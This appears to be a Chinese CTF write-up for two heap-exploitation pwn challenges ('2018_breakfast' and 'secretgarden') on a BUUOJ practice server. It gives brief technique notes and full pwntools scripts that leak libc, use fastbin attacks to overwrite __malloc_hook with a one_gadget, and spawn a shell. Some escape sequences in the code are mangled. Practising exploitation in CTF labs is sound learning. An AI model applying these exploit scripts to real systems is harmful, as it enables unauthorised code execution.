铁人三项(第五赛区)_2018_breakfast
有uaf,先overlap之后leak libc,在fast bin attack,自己审题没有认真(没必要overlap,由于write和read不是同一个指针,所以直接写got表内容即可完成)
from pwn import * #p=process('./2018_breakfast') p=remote('node3.buuoj.cn',29005) libc=ELF('../libc-2.27.so') context.log_level='debug' def add(idx,size): p.recvuntil('5.- Exit') p.sendline('1') p.recvuntil('breakfast') p.sendline(str(idx)) p.recvuntil('kcal.') p.sendline(str(size)) def edit(idx,content): p.recvuntil('5.- Exit') p.sendline('2') p.recvuntil('ingredients') p.sendline(str(idx)) p.recvuntil('ingredients') p.send(content) def show(idx): p.recvuntil('5.- Exit') p.sendline('3') p.recvuntil('see') p.sendline(str(idx)) def delete(idx): p.recvuntil('5.- Exit') p.sendline('4') p.recvuntil('delete') p.sendline(str(idx)) add(0,0x70)#0 add(1,0x70) add(2,0x70) add(3,0x70) add(4,0x70) add(5,0x70) add(6,0x70) add(7,0x70) add(8,0x70) add(9,0x70) add(10,0x70) edit(0,b'p'*0x10+p64(0)+p64(0x81)) delete(1) delete(0) edit(0,'x80') add(0,0x70) add(11,0x70) edit(11,b'p'*0x58+p64(0x481)) delete(1) show(1) libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-96-0x20-libc.symbols['__malloc_hook'] print(hex(libc.address)) onegadget=[0x4f2c5,0x4f322,0x10a38c] one=libc.address+onegadget[2] malloc_hook=libc.symbols['__malloc_hook'] add(4,0x68) add(5,0x68) delete(4) delete(5) edit(5,p64(malloc_hook-0x3)) add(4,0x68) add(4,0x68) edit(4,b'ppp'+p64(one)) add(5,0x20) #gdb.attach(p) p.interactive()
hitcontraining_secretgarden
- leaklibc:malloc一个unsorted bin然后覆盖前8个字节,进行show
- getshell:fastbin attack,然后system即可
from pwn import * #p=process('./secretgarden') p=remote('node3.buuoj.cn',25602) def add(size,name,content): p.recvuntil('choice : ') p.sendline('1') p.recvuntil('name :') p.sendline(str(size)) p.recvuntil('flower :') p.sendline(name) p.recvuntil('flower :') p.sendline(content) def delete(idx): p.recvuntil('choice :') p.sendline('3') p.recvuntil('garden:') p.sendline(str(idx)) def show(): p.recvuntil('choice :') p.sendline('2') def clean(): p.recvuntil('choice :') p.sendline(str(4)) elf=ELF('./secretgarden') libc=ELF('../libc-2.23.so') add(0x90,'pppp','pppp') add(0x68,'pppp','pppp') delete(0) add(0x68,'pppppppp','x10') show() libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-0xa+0x10-libc.symbols['__malloc_hook'] print(hex(libc.address)) delete(1) delete(2) delete(1) realloc = libc.symbols['__libc_realloc'] one_gadget = 0x4526a + libc.address malloc_hook=libc.symbols['__malloc_hook'] add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23)) add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23)) add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23)) add(0x68,b'A'*0x13+p64(0x400c5e),'a ') p.interactive()